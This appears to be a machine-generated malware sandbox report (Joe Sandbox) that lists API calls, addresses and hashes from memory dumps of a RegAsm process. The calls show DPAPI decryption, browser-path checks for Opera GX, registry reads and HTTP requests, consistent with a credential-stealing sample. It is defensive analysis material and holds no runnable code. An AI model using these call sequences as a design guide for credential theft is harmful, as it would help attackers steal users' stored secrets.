                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc$Internetlstrcpy$Open$strtok_s$HeapProcesslstrcatlstrlen$AllocConnectDirectoryExitHttpInformationOptionRequestSleepSystemTimeVolumeWindowsmemset
                                                                                                                                                                                                                                        • String ID: %
                                                                                                                                                                                                                                        • API String ID: 3292282700-2567322570
                                                                                                                                                                                                                                        • Opcode ID: e1c95a4c01a5b8944ecfee2bb706b87a2ab9dee71af13ea143bb6d54da976b17
                                                                                                                                                                                                                                        • Instruction ID: a80d5cc082a79b13c4afddcc74089088984bc40af4cfd8f7e2f84988951bca03
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e1c95a4c01a5b8944ecfee2bb706b87a2ab9dee71af13ea143bb6d54da976b17
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9428F70D10358EADF10EBA5C946BDDBBB4AF19308F5041AEF54573282DB781B48CBA6
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 004171F1
                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,014615B8,00000000,00020119,00422FC0), ref: 00417210
                                                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(00422FC0,01462F30,00000000,00000000,?,000000FF), ref: 00417234
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 00417263
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,01462D68), ref: 00417277
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcat$OpenQueryValuememset
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 558315959-0
                                                                                                                                                                                                                                        • Opcode ID: 7114117b7e44a6b0a2ec1ac4c4aa7947016af69031e2551ac02debfbb669832e
                                                                                                                                                                                                                                        • Instruction ID: 74d8b735119c2182752737772a63e4f349c5be27bf2cba7256ea7a55185fa83a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7114117b7e44a6b0a2ec1ac4c4aa7947016af69031e2551ac02debfbb669832e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F51E370940208ABCB18EFA0CC46FEE7779AB49704F10855EF61967281DB746A89CBE5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(00428AE4,00000000,00000001,00428278,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?), ref: 0041100D
                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 0041101C
                                                                                                                                                                                                                                        • _wtoi64.MSVCRT ref: 00411062
                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00411078
                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 0041107B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: String$Free$AllocCreateInstance_wtoi64
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1817501562-0
                                                                                                                                                                                                                                        • Opcode ID: 757001a73b8a560c4d2357d90eba04831e664b269fe4ba776794b7a64135a60a
                                                                                                                                                                                                                                        • Instruction ID: 0243a214321a8e11e6d6ada038f83521d736f052b3ccf67aedd98e01bceb802f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 757001a73b8a560c4d2357d90eba04831e664b269fe4ba776794b7a64135a60a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72117275B00118AFC710DFA9CC84DAA7BB9EFC9344B1481AAE605C7320DA35EE81CB60
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ReadFile.KERNEL32(?,?,?,?,?), ref: 19C4FE03
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • delayed %dms for lock/sharing conflict at line %d, xrefs: 19C4FE78
                                                                                                                                                                                                                                        • winRead, xrefs: 19C4FE3D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                                                                                        • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                                        • API String ID: 2738559852-1843600136
                                                                                                                                                                                                                                        • Opcode ID: e543d74b8fb931c68ca5a29232e78762216564ebc7b6e966533045c9b170b84a
                                                                                                                                                                                                                                        • Instruction ID: 9a458eab5013231c9b3d4dec374e186d291a1774fe0fdc1b9e350a105b018e70
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e543d74b8fb931c68ca5a29232e78762216564ebc7b6e966533045c9b170b84a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6412772B043466BD300DE64ED8596BB7E8FF84350FA8192DF985C3640D731E91887A2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 00406E40: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002,?,0040CABD,?,00000000,?,00000000,00000000), ref: 00406E77
                                                                                                                                                                                                                                          • Part of subcall function 00406E40: GetFileSizeEx.KERNEL32(00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406E8D
                                                                                                                                                                                                                                          • Part of subcall function 00406E40: LocalAlloc.KERNEL32(00000040,?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EA8
                                                                                                                                                                                                                                          • Part of subcall function 00406E40: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EC1
                                                                                                                                                                                                                                          • Part of subcall function 00406E40: CloseHandle.KERNEL32(00000000,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE9
                                                                                                                                                                                                                                          • Part of subcall function 00411750: LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C
                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,01462058,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CFBB
                                                                                                                                                                                                                                          • Part of subcall function 00406F10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F37
                                                                                                                                                                                                                                          • Part of subcall function 00406F10: LocalAlloc.KERNEL32(00000040,00000000,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F46
                                                                                                                                                                                                                                          • Part of subcall function 00406F10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F5D
                                                                                                                                                                                                                                          • Part of subcall function 00406F10: LocalFree.KERNEL32(?,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F6C
                                                                                                                                                                                                                                        • memcmp.MSVCRT ref: 0040CFF9
                                                                                                                                                                                                                                          • Part of subcall function 00406F90: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406FB5
                                                                                                                                                                                                                                          • Part of subcall function 00406F90: LocalAlloc.KERNEL32(00000040,?,?), ref: 00406FCD
                                                                                                                                                                                                                                          • Part of subcall function 00406F90: LocalFree.KERNEL32(?), ref: 00406FEE
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                                                                        • String ID: $DPAPI
                                                                                                                                                                                                                                        • API String ID: 512175977-1819349886
                                                                                                                                                                                                                                        • Opcode ID: 228dde18d6380654e1e01747a0d40dda2febb3b458d53894edb870cd61412a9d
                                                                                                                                                                                                                                        • Instruction ID: 04e0419f88c9d5c658d70bb4a20b994614d1a13e8e8d8d930ac63f7b7d88e2a3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 228dde18d6380654e1e01747a0d40dda2febb3b458d53894edb870cd61412a9d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E3193B1D001099BCB10DF95DC42FEFB779AB84318F14422AE915B32C2EA395A49C6E5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410545
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0041054C
                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,0145A738,00000000,00020119,00000000), ref: 0041056B
                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,014617D8,00000000,00000000,00000000,000000FF), ref: 00410586
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3676486918-0
                                                                                                                                                                                                                                        • Opcode ID: ebbb83980b96e7640f25af26754c2ff0e91fd82364fa7b8dbd91e5869d307b29
                                                                                                                                                                                                                                        • Instruction ID: 6759878f835c56c9ca0f427d276befcc344c5531ee7d20c41334848b2fd0dccc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ebbb83980b96e7640f25af26754c2ff0e91fd82364fa7b8dbd91e5869d307b29
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0CF04FB9640209BFD714DBA0DC59FAB7BBEEB45B41F105159BA0597250D6709900CBB0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,Opera GX,00427AE6,00427AE3,?,?), ref: 0040E56D
                                                                                                                                                                                                                                          • Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8
                                                                                                                                                                                                                                          • Part of subcall function 00411690: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421FB8,000000FF,?,0040E94A,?,00000000,00000000,00000000), ref: 004116B7
                                                                                                                                                                                                                                          • Part of subcall function 0040CF50: StrStrA.SHLWAPI(00000000,01462058,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CFBB
                                                                                                                                                                                                                                          • Part of subcall function 0040CF50: memcmp.MSVCRT ref: 0040CFF9
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
                                                                                                                                                                                                                                        • String ID: $$Opera GX
                                                                                                                                                                                                                                        • API String ID: 1439182418-3699434461
                                                                                                                                                                                                                                        • Opcode ID: 1749706aa2db81fa6de757973773e7b7360e6dd657e733d53bc66fe27f04b27c
                                                                                                                                                                                                                                        • Instruction ID: 17207a86614afdb77cff5a3d56c68c7749fc063a50330c9fb849252114e4ac69
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1749706aa2db81fa6de757973773e7b7360e6dd657e733d53bc66fe27f04b27c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99128F71911248EACB14EBE5C945BEDBBB8AF19304F14817EF90573286DB781B0CC7A6
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00414100
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004141CF
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrlen
                                                                                                                                                                                                                                        • String ID: ERROR
                                                                                                                                                                                                                                        • API String ID: 1659193697-2861137601
                                                                                                                                                                                                                                        • Opcode ID: df3b25b72e81ea361da62db3694fc4a8dabbd1a4e0db10303024cbd4f1e4006f
                                                                                                                                                                                                                                        • Instruction ID: 7a4a8b2ae2701fe1ed20729628e627548499ab356697860d70efb29cd96e5671
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: df3b25b72e81ea361da62db3694fc4a8dabbd1a4e0db10303024cbd4f1e4006f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8341B6B1900244FFCB00EFA9D846BDE7BB4AB19354F10812EF505A7281DB389648CBE5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8
                                                                                                                                                                                                                                          • Part of subcall function 00405A30: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AA8
                                                                                                                                                                                                                                          • Part of subcall function 00405A30: StrCmpCA.SHLWAPI(?,0145F7A0,?,?,?,?,?,?,00000004), ref: 00405AC0
                                                                                                                                                                                                                                          • Part of subcall function 00405A30: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405AE4
                                                                                                                                                                                                                                          • Part of subcall function 00405A30: HttpOpenRequestA.WININET(00000000,GET,?,01462F48,00000000,00000000,-00400100,00000000), ref: 00405B1B
                                                                                                                                                                                                                                          • Part of subcall function 00405A30: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B3F
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0042248F), ref: 00413DB5
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Internet$Open$ConnectHttpOptionRequestlstrcpy
                                                                                                                                                                                                                                        • String ID: ERROR$ERROR
                                                                                                                                                                                                                                        • API String ID: 1815705353-2579291623
                                                                                                                                                                                                                                        • Opcode ID: 60aaeff547289181ae8f8bb4519d178c4f6478f03eee4e5f3c1696f8079ee93f
                                                                                                                                                                                                                                        • Instruction ID: 2de14b8495628cd286d50378bf444954eaaf3636dd8b2d3ca14243e0d5a7f802
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 60aaeff547289181ae8f8bb4519d178c4f6478f03eee4e5f3c1696f8079ee93f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99414F30914289DADB10EBA5C5057DDBBE8AF19308F5041AEF905636C2DFB81B08C7F6
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00411A5C
                                                                                                                                                                                                                                        • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411A77
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00411A7E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
